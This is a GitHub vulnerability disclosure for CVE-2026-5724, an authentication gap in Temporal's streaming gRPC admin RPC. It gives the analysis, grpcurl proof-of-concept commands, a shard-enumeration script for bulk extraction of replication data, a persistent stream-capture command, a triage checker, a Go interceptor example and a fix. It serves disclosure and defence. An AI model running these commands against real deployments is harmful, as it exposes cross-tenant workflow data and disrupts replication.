tibrn/CVE-2026-5724

GitHub: tibrn/CVE-2026-5724

This repository discloses a missing-authentication vulnerability in Temporal's frontend gRPC streaming RPCs (CVE-2026-5724) and provides a full vulnerability analysis, PoC scripts and a proposed fix.

Stars: 0 | Forks: 0

## Summary

The Temporal frontend service does not enforce authentication on streaming gRPC RPCs. The streaming interceptor chain omits the authorization interceptor, so an unauthenticated caller can reach `AdminService/StreamWorkflowReplicationMessages`, an admin-only privileged endpoint that streams workflow replication data across all namespaces.

#### Details

The frontend gRPC server in `service/frontend/fx.go` is configured with two interceptor chains. The streaming chain contains only `telemetryInterceptor.StreamIntercept`, used for metrics collection, and no authentication:

https://github.com/temporalio/temporal/blob/c9a39e6914c0b3a114ddfe42e991334ed911a4cf/service/frontend/fx.go#L292-L294

The `authorization.Interceptor` type implements only the unary interceptor method (`Intercept`); there is no corresponding streaming interceptor method. The frontend's only streaming RPC is `AdminService/StreamWorkflowReplicationMessages`, which, according to https://github.com/temporalio/temporal/blob/c9a39e6914c0b3a114ddfe42e991334ed911a4cf/common/api/metadata.go#L214-L215, should require `{Scope: ScopeCluster, Access: AccessAdmin}`. The streaming call reaches the handler at [admin_handler.go:1904](https://github.com/temporalio/temporal/blob/c9a39e6914c0b3a114ddfe42e991334ed911a4cf/service/frontend/admin_handler.go#L1904-1905) without any authorization check, and the handler proxies it straight to the internal history service's replication endpoint.

#### PoC

Take a Temporal deployment whose frontend gRPC API is exposed. Call the streaming AdminService RPC with no credentials at all (grpcurl resolves the service through server reflection; if reflection is disabled on the target, pass the Temporal API protos with `-proto`/`-import-path` instead):

```
grpcurl -max-time 15 \
  -H "temporal-client-cluster-id: 1" \
  -H "temporal-client-shard-id: 1" \
  -H "temporal-server-cluster-id: 1" \
  -H "temporal-server-shard-id: 1" \
  -d '{"syncReplicationState":{"inclusiveLowWatermark":0,"highPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"},"lowPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"}}}' \
  temporal-frontend.example.com:443 \
  temporal.server.api.adminservice.v1.AdminService/StreamWorkflowReplicationMessages

# The stream connects. The server responds with replication state, including
# the exclusiveHighWatermark of each shard. During active replication the
# response contains serialized workflow history events:
# {
#   "messages": {
#     "replicationTasks": [{
#       "namespaceId": "...",
#       "workflowId": "...",
#       "runId": "...",
#       "taskType": "REPLICATION_TASK_TYPE_HISTORY_V2_TASK",
#       ...
#     }],
#     "exclusiveHighWatermark": "148293"
#   }
# }
```

Enumerate every shard and extract data in bulk:

```
#!/usr/bin/env bash
set -euo pipefail

TARGET="${1:-temporal-frontend.example.com:443}"
NUM_SHARDS="${2:-1024}"
CLUSTER_ID="${3:-1}"   # initialFailoverVersion: 1=active, 2=failover
ADMIN_SVC="temporal.server.api.adminservice.v1.AdminService"

for SHARD in $(seq 1 "${NUM_SHARDS}"); do
  grpcurl -max-time 10 \
    -H "temporal-client-cluster-id: ${CLUSTER_ID}" \
    -H "temporal-client-shard-id: ${SHARD}" \
    -H "temporal-server-cluster-id: ${CLUSTER_ID}" \
    -H "temporal-server-shard-id: ${SHARD}" \
    -d '{"syncReplicationState":{"inclusiveLowWatermark":0,"highPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"},"lowPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"}}}' \
    "${TARGET}" "${ADMIN_SVC}/StreamWorkflowReplicationMessages" 2>&1 || true
done
```

Keep the stream open persistently and capture replication events in real time (`-d @` makes grpcurl read one JSON request message after another from stdin for the lifetime of the stream):

```
(
  while true; do
    echo '{"syncReplicationState":{"inclusiveLowWatermark":0,"highPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"},"lowPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"}}}'
    sleep 5
  done
) | grpcurl -d @ \
  -H "temporal-client-cluster-id: 1" \
  -H "temporal-client-shard-id: 1" \
  -H "temporal-server-cluster-id: 1" \
  -H "temporal-server-shard-id: 1" \
  temporal-frontend.example.com:443 \
  temporal.server.api.adminservice.v1.AdminService/StreamWorkflowReplicationMessages
```

#### Impact

An attacker with network access to the frontend can, without any credentials, read workflow replication data across all namespaces and tenants, including workflow IDs, run IDs, history events and activity payloads. The attacker can also interfere with cross-datacenter replication by sending `SyncReplicationState` messages, and gains a bridge to the internal history service, which is normally never exposed externally.

Note that the missing interceptor only makes a difference where the deployment has configured an authorizer and claim mapper; Temporal's default authorizer is a noop that allows every request, so on a default deployment the unary admin RPCs are just as open as the streaming one.

#### Fix

Implement `StreamServerInterceptor` on `authorization.Interceptor` and add it to the streaming chain at `service/frontend/fx.go:292-296`:

```
streamInterceptor := []grpc.StreamServerInterceptor{
    telemetryInterceptor.StreamIntercept,
    authInterceptor.StreamIntercept, // enforce auth on streaming RPCs
}
```

With the telemetry interceptor still listed first, streams that the new interceptor rejects are still recorded in metrics, which is what you want for spotting anonymous probing of the admin service.
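As an added triage helper that is not part of tibrn/CVE-2026-5724 or of Temporal, the script below turns the PoC above into a yes/no check. The point a tester needs is the comparison: probe a unary admin RPC (`DescribeCluster`, assumed here as the control) and the streaming RPC with the same empty credentials, then read the two results together. "Unary rejected, stream open" is the signature of the missing stream interceptor; "both open" just means no authorizer is configured. The target host, cluster and shard IDs are placeholders, and the `SAMPLE_*` outputs are constructed for the offline demo, not captured from a real server.

```shell
#!/usr/bin/env sh
# Added triage helper; not part of tibrn/CVE-2026-5724 or of Temporal.
# Compares an anonymous unary admin RPC (control) with the anonymous streaming
# RPC. Host/cluster/shard values are placeholders; SAMPLE_* outputs below are
# constructed for the offline demo, not captured.
set -eu

ADMIN_SVC="temporal.server.api.adminservice.v1.AdminService"
STREAM_RPC="${ADMIN_SVC}/StreamWorkflowReplicationMessages"
UNARY_RPC="${ADMIN_SVC}/DescribeCluster"   # assumed unary control, gated by the unary chain

SYNC_STATE='{"syncReplicationState":{"inclusiveLowWatermark":0,"highPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"},"lowPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"}}}'

# classify_grpcurl_output <exit_code> <combined stdout+stderr>
# grpcurl reports a failed RPC as "ERROR:" / "  Code: <status>" / "  Message: ...".
# Prints REJECTED, STREAM_OPEN or INCONCLUSIVE.
classify_grpcurl_output() {
  code="$1"; out="$2"
  case "$out" in
    *"Code: Unauthenticated"*|*"Code: PermissionDenied"*)
      echo REJECTED ;;
    *'"exclusiveHighWatermark"'*|*'"replicationTasks"'*|*'"syncShardStatus"'*)
      # replication payload arrived before any error (e.g. -max-time expiry)
      echo STREAM_OPEN ;;
    *)
      if [ "$code" -eq 0 ]; then echo STREAM_OPEN; else echo INCONCLUSIVE; fi ;;
  esac
}

# verdict <unary_class> <stream_class>
# The tell-tale is the mismatch: unary admin RPC rejected, streaming RPC accepted.
# Both open usually means no authorizer at all (Temporal's default is a noop).
verdict() {
  case "$1:$2" in
    REJECTED:STREAM_OPEN)    echo "VULNERABLE: unary chain enforces authz, streaming chain does not" ;;
    REJECTED:REJECTED)       echo "PATCHED: streaming chain enforces authorization" ;;
    STREAM_OPEN:STREAM_OPEN) echo "NO-AUTHZ: anonymous unary calls succeed too; authorizer not configured" ;;
    *)                       echo "INCONCLUSIVE: unary=$1 stream=$2" ;;
  esac
}

# probe <host:port> -- live check; runs grpcurl, so only reached with --probe.
probe() {
  target="$1"
  u_out=$(grpcurl -max-time 10 -d '{}' "$target" "$UNARY_RPC" 2>&1) && u_code=0 || u_code=$?
  s_out=$(grpcurl -max-time 10 \
      -H "temporal-client-cluster-id: 1" -H "temporal-client-shard-id: 1" \
      -H "temporal-server-cluster-id: 1" -H "temporal-server-shard-id: 1" \
      -d "$SYNC_STATE" "$target" "$STREAM_RPC" 2>&1) && s_code=0 || s_code=$?
  verdict "$(classify_grpcurl_output "$u_code" "$u_out")" \
          "$(classify_grpcurl_output "$s_code" "$s_out")"
}

# Constructed sample outputs (offline demo only).
SAMPLE_DENIED='ERROR:
  Code: PermissionDenied
  Message: Request unauthorized.'
SAMPLE_STREAM='{
  "messages": {
    "replicationTasks": [],
    "exclusiveHighWatermark": "148293"
  }
}
ERROR:
  Code: DeadlineExceeded
  Message: context deadline exceeded'

if [ "${1:-}" = "--probe" ]; then
  probe "${2:-temporal-frontend.example.com:443}"
else
  verdict "$(classify_grpcurl_output 1 "$SAMPLE_DENIED")" \
          "$(classify_grpcurl_output 1 "$SAMPLE_STREAM")"
fi
```

Run it with `--probe host:port` against a lab instance; without arguments it classifies the constructed samples, which exercise the "unary denied, stream delivered a watermark before the deadline" case.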
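The fix section above proposes a `StreamIntercept` method on the authorization interceptor but does not show one. The following is an added example, not code from temporalio/temporal or from tibrn/CVE-2026-5724: it rebuilds the two streaming chains with stdlib-only stand-ins that have the same shapes as `grpc.StreamServerInterceptor`, `grpc.StreamHandler` and `grpc.StreamServerInfo` (so it runs without the grpc module), and shows the full-method-name lookup, the claims comparison and the fail-closed default that such an interceptor needs. The `Claims` struct, the policy table, the method name constant and the chain order are assumptions chosen to match the advisory text.

```go
// Added example; not code from temporalio/temporal or from tibrn/CVE-2026-5724.
// Stdlib-only stand-ins mirror the grpc stream interceptor types so the file
// runs without the grpc module. Claims model, policy table and chain order are
// assumptions matching the advisory; authInterceptor.StreamIntercept is the
// method the advisory proposes.
package main

import (
	"context"
	"errors"
	"fmt"
)

// Same shapes as grpc.ServerStream / StreamHandler / StreamServerInfo / StreamServerInterceptor.
type ServerStream interface{ Context() context.Context }
type StreamHandler func(srv interface{}, stream ServerStream) error
type StreamServerInfo struct{ FullMethod string }
type StreamServerInterceptor func(srv interface{}, ss ServerStream, info *StreamServerInfo, handler StreamHandler) error

type fakeStream struct{ ctx context.Context }

func (s fakeStream) Context() context.Context { return s.ctx }

// chainStream nests interceptors like grpc.ChainStreamInterceptor: ics[0] is outermost.
func chainStream(ics []StreamServerInterceptor) StreamServerInterceptor {
	return func(srv interface{}, ss ServerStream, info *StreamServerInfo, handler StreamHandler) error {
		return runFrom(ics, 0, srv, ss, info, handler)
	}
}

func runFrom(ics []StreamServerInterceptor, i int, srv interface{}, ss ServerStream, info *StreamServerInfo, handler StreamHandler) error {
	if i == len(ics) {
		return handler(srv, ss)
	}
	return ics[i](srv, ss, info, func(srv interface{}, ss ServerStream) error {
		return runFrom(ics, i+1, srv, ss, info, handler)
	})
}

// Access levels ordered so "<" means "less than required".
type Access int

const (
	AccessUndefined Access = iota
	AccessRead
	AccessWrite
	AccessAdmin
)

// Claims is a cut-down stand-in for authorization.Claims: cluster-scope access only (assumed).
type Claims struct{ System Access }

type claimsKey struct{}

func withClaims(ctx context.Context, c *Claims) context.Context {
	return context.WithValue(ctx, claimsKey{}, c)
}

func claimsFrom(ctx context.Context) *Claims {
	c, _ := ctx.Value(claimsKey{}).(*Claims)
	return c
}

const streamMethod = "/temporal.server.api.adminservice.v1.AdminService/StreamWorkflowReplicationMessages"

// requiredAccess stands in for the metadata table the advisory cites:
// the replication stream is cluster-scoped and needs AccessAdmin.
var requiredAccess = map[string]Access{streamMethod: AccessAdmin}

var ErrUnauthorized = errors.New("Request unauthorized.")

// authInterceptor is the piece the pre-fix streaming chain lacks.
type authInterceptor struct{}

// StreamIntercept resolves the policy for the full method name, compares it with
// the caller's claims, and only then hands off to the handler. Methods with no
// policy entry fail closed instead of falling through to the handler.
func (authInterceptor) StreamIntercept(srv interface{}, ss ServerStream, info *StreamServerInfo, handler StreamHandler) error {
	need, known := requiredAccess[info.FullMethod]
	if !known {
		return fmt.Errorf("%w (no policy for %s)", ErrUnauthorized, info.FullMethod)
	}
	if c := claimsFrom(ss.Context()); c == nil || c.System < need {
		return ErrUnauthorized
	}
	return handler(srv, ss)
}

// telemetryInterceptor records every method it sees and passes through.
type telemetryInterceptor struct{ calls []string }

func (t *telemetryInterceptor) StreamIntercept(srv interface{}, ss ServerStream, info *StreamServerInfo, handler StreamHandler) error {
	t.calls = append(t.calls, info.FullMethod)
	return handler(srv, ss)
}

// replicationHandler stands in for the admin handler that proxies to history:
// reaching it is the outcome we must prevent for anonymous callers.
func replicationHandler(srv interface{}, _ ServerStream) error {
	*srv.(*bool) = true
	return nil
}

// vulnerableChain mirrors the pre-fix chain: telemetry only.
func vulnerableChain(t *telemetryInterceptor) StreamServerInterceptor {
	return chainStream([]StreamServerInterceptor{t.StreamIntercept})
}

// fixedChain appends the authorization interceptor, as the proposed fix does.
func fixedChain(t *telemetryInterceptor) StreamServerInterceptor {
	return chainStream([]StreamServerInterceptor{t.StreamIntercept, authInterceptor{}.StreamIntercept})
}

// callStream drives one streaming RPC through chain and reports whether the
// handler ran and the error the caller would see.
func callStream(ctx context.Context, chain StreamServerInterceptor, method string) (reached bool, err error) {
	err = chain(&reached, fakeStream{ctx: ctx}, &StreamServerInfo{FullMethod: method}, replicationHandler)
	return reached, err
}

func main() {
	tel := &telemetryInterceptor{}
	anon := context.Background()
	r1, e1 := callStream(anon, vulnerableChain(tel), streamMethod)
	r2, e2 := callStream(anon, fixedChain(tel), streamMethod)
	r3, e3 := callStream(withClaims(anon, &Claims{System: AccessAdmin}), fixedChain(tel), streamMethod)
	fmt.Printf("pre-fix anonymous: reached=%v err=%v\nfixed anonymous:   reached=%v err=%v\nfixed admin:       reached=%v err=%v\n", r1, e1, r2, e2, r3, e3)
}
```

Two design points carry over to the real fix: the lookup is keyed on `info.FullMethod`, so a new streaming RPC added later without a policy entry is rejected rather than silently open, and telemetry stays outermost so rejected streams are still counted.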
Tags: CISA project, CVE, gRPC, PoC, Python tool, SDLC, Temporal, Temporal Frontend, middleware vulnerability, distributed systems, response size analysis, security vulnerability, workflow engine, application security, microservice security, digital signatures, log auditing, brute force, unauthorized access, streaming, authentication bypass, missing authorization